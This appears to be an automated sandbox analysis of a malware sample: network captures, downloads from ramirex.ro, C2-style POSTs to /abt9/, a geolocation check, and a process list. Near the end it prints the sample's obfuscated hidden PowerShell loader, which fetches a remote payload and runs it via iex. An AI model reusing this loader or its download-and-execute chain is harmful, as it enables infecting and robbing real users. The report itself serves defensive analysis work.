                              May 31, 2024 08:09:35.811671972 CEST | 1236 | IN | Data Raw: 51 e0 88 c7 ca ce 56 80 8f 78 e4 01 84 2d 72 d7 6b 49 40 8f f5 1d ce f6 b5 5f 34 61 7e e7 54 07 51 e7 ff af b9 26 3f df 31 cf 26 d1 43 32 48 fa 76 db a9 0e 66 96 72 20 12 30 5d 60 34 c2 b8 8c ad e3 91 e2 dd 2f 32 4d 74 de 98 cb 15 84 40 ba 88 ff
                              Data Ascii: QVx-rkI@_4a~TQ&?1&C2Hvfr 0]`4/2Mt@*I7miST1OZsF:/G%]pQrE<j(4U~\f^~Tb'kXMZGc0'#SE`w`YQWF@ e1HMLF.PmLKYL$@
                              May 31, 2024 08:09:35.811685085 CEST | 1236 | IN | Data Raw: 2a a5 cf 12 44 ad d3 33 8a f2 d2 dc 98 6b 5e 54 24 5e 52 5e 28 fb 52 0e ca 20 38 ca 3f 76 e2 d9 dc 66 04 ff 79 77 c2 49 0a 2e a8 1d 5a 42 70 87 ec c4 0e 3a d6 63 0b 66 67 12 6f bf d1 5c 43 ee 0d e7 6f 0e c3 03 09 86 f4 dc 8f 84 12 85 a0 0c 59 cf
                              Data Ascii: *D3k^T$^R^(R 8?vfywI.ZBp:cfgo\CoYP@Ia9c'><a6iBb1~sYs=*W6n5kkU_o(Zt,%*=nAHI#I
                              May 31, 2024 08:09:35.811697960 CEST | 672 | IN | Data Raw: 65 ae 91 d8 99 3c 67 6c 86 b0 46 98 aa 3d ae 49 85 e2 79 12 13 c1 52 0f 6e 28 f3 fe e9 7f e2 5f f8 66 57 8a 7c 70 25 bf 68 80 b8 f1 f2 98 ee 4b 16 b0 6c c6 c3 f0 ab 42 8c 44 91 0d 0b dd de 86 cf cc 4f b8 83 f3 c6 ad 41 e3 e1 cc 33 39 40 6c 73 1c
                              Data Ascii: e<glF=IyRn(_fW|p%hKlBDOA39@lszF/k:$34N:8PUUzcmkvU@Vk|2EyyEG6@]s,Cr<NsXRo[Zk ]t]3OzQG&vf{xq#}
                              May 31, 2024 08:09:35.898271084 CEST | 1236 | IN | Data Raw: c3 f1 d0 e7 13 d1 ee 22 b1 6c 41 f0 15 89 9d c4 3f 0c 15 4a f9 1f 9a db f5 9b 7e 5a 8b 73 87 ec 9d af 38 1a 02 50 df 61 4d 90 30 79 48 15 f9 17 6b 49 0e c3 68 7f 7b 79 25 8d 69 f5 3c 6e 1a 3c f9 8b af ad b6 15 3a e0 11 99 c5 73 84 26 23 49 16 68
                              Data Ascii: "lA?J~Zs8PaM0yHkIh{y%i<n<:s&#Ih_0t=n\!oXv)n,` 1 (<w!pU+3XY/;_`Oo"$K$dfIb%;Rx<hjmk 3{[U> L1UpQb=W,/*Di
                              May 31, 2024 08:09:35.898292065 CEST | 224 | IN | Data Raw: a4 de 5c 11 c1 ea 8e d8 c7 0c 6b 6a d1 ee 3c 15 47 bc 7a b2 99 04 e7 37 0b 14 af c5 5b 0a 0b 9e 7e 84 2e 94 7b 47 df 8c 9a 9a 52 d7 2a 03 a9 bf 61 9e 1d 6b 99 c6 45 66 6b 09 47 77 71 d5 8d 61 6f a4 2d 52 31 51 09 e2 ee 7b 25 64 ff e9 14 56 92 e8
                              Data Ascii: \kj<Gz7[~.{GR*akEfkGwqao-R1Q{%dVRg(OB1vR4pK6r|yA/7pF8az:27Pm[7~g 0T+niGA|l`[X%0Ify^f-@_
                              May 31, 2024 08:09:35.898405075 CEST | 1236 | IN | Data Raw: 1e e9 eb 8f 07 18 41 f6 9c 49 fa 1b 3a ea 33 78 7b 18 f9 ac 11 db ee c5 4b ed e2 5b aa af 16 89 4e e3 24 1d db 9e d0 01 87 29 72 bd b3 d5 5c 23 2e 94 52 93 91 32 8c 36 30 02 5c 48 87 b1 2e 79 33 1f 90 cf 78 bc 5c 93 44 a3 9c c9 b7 e6 d9 b3 58 b7
                              Data Ascii: AI:3x{K[N$)r\#.R260\H.y3x\DX+,a$YDU|Y>Y:g'u?(v@NLmi"I(xdM**5+)WClAcwJj_mv2#ap-)vj~(_u)
                              May 31, 2024 08:09:35.898446083 CEST | 1236 | IN | Data Raw: d8 1f 7c 02 fb 92 00 4b 7e 4f 02 2b 01 12 e9 a8 ea a5 4c fc 44 31 53 d4 b2 01 f9 64 f9 17 35 7c da df e0 bd ac 5c 7d 20 6d ec d6 52 84 d6 e7 0c 1b f6 5b 87 5f fd 62 09 73 c1 5f 37 6e 6d 5d 8f d2 36 43 48 e4 3b c3 68 9d 1b 39 94 07 f0 86 50 8e 03
                              Data Ascii: |K~O+LD1Sd5|\} mR[_bs_7nm]6CH;h9P9l)ZE!>rl_w:O3W pW>cnV|k kKA)M'`|L]RMQlfo[?{]J3R* _-iq=o=zL#yVOiUgBc
                              May 31, 2024 08:09:35.898461103 CEST | 1236 | IN | Data Raw: 69 dd 80 25 60 99 a2 a8 81 47 08 81 32 68 c2 6c b7 be a7 fc 71 18 1a 5a 5b 60 80 91 c7 e2 c2 04 f3 9a 32 27 6c 7e a7 e1 31 86 50 90 df 07 b6 83 7c 17 70 71 6c 93 ee 2e d5 b5 ff c2 7f c5 14 ec 18 c9 67 de 8d 78 fa 7d 7b 43 f6 a0 59 4f ed ef 3f 07
                              Data Ascii: i%`G2hlqZ[`2'l~1P|pql.gx}{CYO?y%R{`Gn;3s,P=GHR0~Tg=v<&$XjBZY0p1#O|co-R1z3J?T=F'.S^#b-lGh-Z{Jdt}k$


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              2 | 192.168.2.6 | 51550 | 178.237.33.50 | 80 | 7108 | C:\Program Files (x86)\Windows Mail\wab.exe
                              Timestamp | Bytes transferred | Direction | Data
                              May 31, 2024 08:09:38.715168953 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                              Host: geoplugin.net
                              Cache-Control: no-cache
                              May 31, 2024 08:09:39.342955112 CEST | 1171 | IN | HTTP/1.1 200 OK
                              date: Fri, 31 May 2024 06:09:39 GMT
                              server: Apache
                              content-length: 963
                              content-type: application/json; charset=utf-8
                              cache-control: public, max-age=300
                              access-control-allow-origin: *
                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                              Data Ascii: { "geoplugin_request":"8.46.123.175", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              3 | 192.168.2.6 | 51558 | 137.220.252.40 | 80 | 6928 | C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe
                              Timestamp | Bytes transferred | Direction | Data
                              May 31, 2024 08:10:50.697144032 CEST | 471 | OUT | GET /abt9/?URl0T=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtP4lJF/NTbeuWt8c3rTDi+tIT1z/PR+XwsW/JFZfA6LrcKjOeOKI=&_t6=urjP348hAPL0Tj-P HTTP/1.1
                              Host: www.387mfyr.sbs
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Language: en-us
                              Connection: close
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                              May 31, 2024 08:10:51.477447033 CEST | 691 | IN | HTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Fri, 31 May 2024 06:10:51 GMT
                              Content-Type: text/html
                              Content-Length: 548
                              Connection: close
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              4 | 192.168.2.6 | 51559 | 37.235.104.9 | 80 | 6928 | C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe
                              Timestamp | Bytes transferred | Direction | Data
                              May 31, 2024 08:11:06.606436968 CEST | 733 | OUT | POST /abt9/ HTTP/1.1
                              Host: www.led-svitidla.eu
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Origin: http://www.led-svitidla.eu
                              Referer: http://www.led-svitidla.eu/abt9/
                              Cache-Control: max-age=0
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Content-Length: 210
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                              Data Raw: 55 52 6c 30 54 3d 76 58 56 36 65 6f 50 64 4a 34 37 52 68 72 59 53 48 71 56 6b 46 49 6a 66 6a 58 31 7a 64 41 46 31 70 63 52 76 45 5a 73 41 66 46 46 36 65 72 67 6b 49 59 71 6b 2b 2f 6a 62 38 63 63 37 69 2b 59 59 34 6a 31 42 78 4b 33 6c 6d 6d 34 4f 34 74 34 62 59 33 4a 54 4a 55 6a 4e 70 63 6a 61 2f 4e 45 69 79 4a 5a 6f 63 72 69 36 67 51 61 51 7a 6a 73 77 53 4f 39 64 42 73 74 46 6d 45 50 50 4e 75 4b 57 38 68 33 52 34 4c 4e 69 56 73 46 47 34 6b 78 62 71 58 4e 2b 34 59 45 46 70 6b 45 62 30 62 62 4f 2b 31 43 37 49 78 67 6a 71 4c 71 35 48 50 4f 69 37 31 77 6c 6c 70 79 4c 74 36 34 35 70 42 4e 48 34 32 30 6b 6c 34 30 52 4e 33 72 50
                              Data Ascii: URl0T=vXV6eoPdJ47RhrYSHqVkFIjfjX1zdAF1pcRvEZsAfFF6ergkIYqk+/jb8cc7i+YY4j1BxK3lmm4O4t4bY3JTJUjNpcja/NEiyJZocri6gQaQzjswSO9dBstFmEPPNuKW8h3R4LNiVsFG4kxbqXN+4YEFpkEb0bbO+1C7IxgjqLq5HPOi71wllpyLt645pBNH420kl40RN3rP
                              May 31, 2024 08:11:07.296140909 CEST | 544 | IN | HTTP/1.1 404 Not Found
                              Date: Fri, 31 May 2024 06:11:07 GMT
                              Server: Apache
                              X-Content-Type-Options: nosniff
                              X-XSS-Protection: 1;mode=block
                              Content-Length: 315
                              Connection: close
                              Content-Type: text/html; charset=iso-8859-1
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                              Session ID:5
                              Source IP:192.168.2.6
                              Source Port:51561
                              Destination IP:37.235.104.9
                              Destination Port:80
                              Timestamp | Bytes transferred | Direction | Data
                              May 31, 2024 08:11:11.760797977 CEST | 757 | OUT | POST /abt9/ HTTP/1.1
                              Host: www.led-svitidla.eu
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Origin: http://www.led-svitidla.eu
                              Referer: http://www.led-svitidla.eu/abt9/
                              Cache-Control: max-age=0
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Content-Length: 234
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                              Data Ascii: URl0T=vXV6eoPdJ47R7LoSGLVkHojc9n1zKQEdpcdvEccQfQt6eOEkPdGkr/jb38c+teYX4jxzxLLlmmsO4tobYFhQPUjLysjUytEiyJZocrmQgQCQvHowdP9efctCw0PPJuKS8h3j4KRbVqZG4g5brCh9hoEDnEFvkbDH5yjfLCQP5MuJC5P4nGwG35SJt4gLphNt62Mk3v42CDOs9MOeGvlYw+fmzj5VJ5SmnA==
                              May 31, 2024 08:11:12.544970989 CEST | 544 | IN | HTTP/1.1 404 Not Found
                              Date: Fri, 31 May 2024 06:11:12 GMT
                              Server: Apache
                              X-Content-Type-Options: nosniff
                              X-XSS-Protection: 1;mode=block
                              Content-Length: 315
                              Connection: close
                              Content-Type: text/html; charset=iso-8859-1
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                              Session ID:0
                              Source IP:192.168.2.6
                              Source Port:51553
                              Destination IP:188.215.50.15
                              Destination Port:443
                              PID:504
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-05-31 06:09:44 UTC | 170 | OUT | GET /Rutschebanes.qxd HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: ramirex.ro
                              Connection: Keep-Alive
                              2024-05-31 06:09:44 UTC | 365 | IN | HTTP/1.1 200 OK
                              Date: Fri, 31 May 2024 06:09:44 GMT
                              Server: Apache/2.2.34 (Unix) mod_ssl/2.2.34 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_qos/11.5 mod_fcgid/2.3.9
                              Last-Modified: Sun, 26 May 2024 15:12:56 GMT
                              ETag: "26600d4-66eac-6195cd5e836f3"
                              Accept-Ranges: bytes
                              Content-Length: 421548
                              Connection: close
                              Content-Type: application/vnd.quark.quarkxpress


                              Session ID:1
                              Source IP:192.168.2.6
                              Source Port:51555
                              Destination IP:188.215.50.15
                              Destination Port:443
                              PID:3640
                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-05-31 06:10:16 UTC | 179 | OUT | GET /HtwvlcDSFcrAhhcHdD97.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: ramirex.ro
                              Cache-Control: no-cache
                              2024-05-31 06:10:16 UTC | 356 | IN | HTTP/1.1 200 OK
                              Date: Fri, 31 May 2024 06:10:16 GMT
                              Server: Apache/2.2.34 (Unix) mod_ssl/2.2.34 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_qos/11.5 mod_fcgid/2.3.9
                              Last-Modified: Sun, 26 May 2024 15:08:50 GMT
                              ETag: "266009d-41e40-6195cc739c2e3"
                              Accept-Ranges: bytes
                              Content-Length: 269888
                              Connection: close
                              Content-Type: application/octet-stream


                              Target ID:0
                              Start time:02:09:01
                              Start date:31/05/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.bat" "
                              Imagebase:0x7ff7458b0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:2
                              Start time:02:09:01
                              Start date:31/05/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:3
                              Start time:02:09:01
                              Start date:31/05/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:powershell.exe -windowstyle hidden "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. 
A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. 
Ph lHSag,regenteaC erudNdlideSt.ncrRv kasDea,l[Zoo o$S,gmoLVerbar pollrRublae C.pudgarvesVenstk TresjKrabao leazlNongae SandrSpisenBrysteTar.isAnska]Socia=.mfan$jail,fTykneeL gmesKv knt Rosed Brisr Alena Ver gunpurt Urlie EnvonS,rafs Uvil ');$Laserjet=Sortkridtstegningens 'Indri$BegohSO.herkSansei EnerfS eketExigeeFlasktMonar1Tilba4 .isk.reconDStratowaff w HermnUdspilp,lygoAng.va BunddmirisFA.glui .otolAwesoe igh(Numis$T,gvohFrimey.dninp Embre S,earGood.mBinnon redeeHestesSkovtiAdopta Alte,Trudy$ AbonA.uggslOmnivmpomo,eIndlanIscenvSti.leinkublNapht)Ggede ';$Almenvel=$Ruinhobens[0];Caprellidae (Sortkridtstegningens 'Resin$ Praeg enstlZechsoMisseb E.deaPreanlAmtsv:LacriS Rottk NatiiSkalklHedipd EquipSt,pua Afsld DiscdAn,iteFryserHomoonGo.rie .ela2 Ph l4 O te9Sitzy=Grund(.odtgTKill eFro tsSyllitDisci-Prep,PKri.saSemiptSubvehPassi Forsl$CanccAOverml GamamNath eOrdgynFunktvSma.seKultul,dled) Bra. ');while (!$Skildpadderne249) {Caprellidae (Sortkridtstegningens 'Forha$SedergRev llOsciloAngakbKamgaaPa irlTaggy:TrappMChessoGatchlAntagdfugtsaHyttevkrickiKulsotAnskueamput=.kyph$.abent TranrDanseuA.kaneAller ') ;Caprellidae $Laserjet;Caprellidae (Sortkridtstegningens 'UpthrS isaptFlsk.aBrillrUdbldtVareb-Dest SKaut lslagteUpaakeInsinpFirep a bum4 Bund ');Caprellidae (Sortkridtstegningens '.etsp$WheregGaleolOdyssoBan bbJo,ana sy elUnsta:opgivS SspekFl eribigb,lM jusdAssaup.vmmea Sc,nd nterd Nonpe P,llrO hobnAsconemacul2Randy4F.yve9Phone=Blond(WaggoTMo,ioeBlancsChichtplumb- ArbePPreadaUnirrtTinfohK,lon Paras$ColeoAKamg.l Hor mAd neekom.dnOvercvLatcheStatelNo,co)Venog ') ;Caprellidae (Sortkridtstegningens ' Menu$kbarsgSolcrlGad toTecasb Tag aMortalFlues:TestaUInterdWavineUncurnBroded,tochr.errgsBarysa bl lr RaadbPrebeegillsjHaem,dSangleHydat= kand$KroatgGangblAnaxto GridbKonk aSko.glProto:SnitzlArgotyToldea Bra.nCredicW.lloeslalo+Phane+Ubetn%Grx,a$Term.GSengiyTilbarInforoAdenosl thocSvineobantip,ilatiRubbec Ch,k.MarkscHidrooFre.ru daninGalentUnhoo ') 
;$hypermnesia=$Gyroscopic[$Udendrsarbejde];}$Exaltee=316524;$Umyndiges=29862;Caprellidae (Sortkridtstegningens 'F.rme$ F.digBu del FremoHa.tebCellea Rovil.ileu: offiJProh.eForfrdfun.teExpun T,ops=repai OutpGMyoseeBeskytF,rkl-indusCFraado Gul.nObsert Un,eeHe atnUslintSprin Pend$ andAHy,solkomp.mSku,geDumphnSnusevM trie.estilKrist ');Caprellidae (Sortkridtstegningens 'Trlkv$ Ov rgFi,zelintrooUtaalbbenigaYawpelNveny:kerateFedertHypereL vsar bsecn,hodei,lgest.achifStrygaLandsbIrrevrAlbueiThermkGo,dak.ersoeProspn I.ds Upisl=Unter .acop[ Bo bSHusary A chsGracitHamareExonem Slut.RaesoCAveceoB,mstn indev triueT,ldnrPre it Klas]Regi.:Stamb:IrratFIntr rForbloIotizmAllerBTfleda Unbastrafie,prin6Reduk4ReverS PsamtO erlrc.imbiWashbnAttrig lowe(Choke$Ram.iJS.anse RygedB weaeMagda)Store ');Caprellidae (Sortkridtstegningens ' ,ant$SeelfgSta,glL ndmoSta.abPhonoaA.lbelNi ot:k.rtoi ,nterRep.srUnclaehasles,oloutBlomsrspildaTeleoiLimnonE.ikka Nyl.bsuppolBevogyReve Ideli=Thyro Sy te[L,atuSTestuyasilisJona tTalkieSkarpmC.she. WaggT Serie MajoxUnasstRea,d.TrianEUdvikn Bi lc ForsoFremtdVicefiUdko.nParalgDati,]Udstd:S art:Cari,A Cen.SRy.keCal,enIFuldsISlide.B reaGFoto eDomintsprjtSUnthitSnowbrGunati DynenFevergInd k( Ting$ShavueRetrotUkurae VarmrAdlesnbarneiDan.rt Tetrf 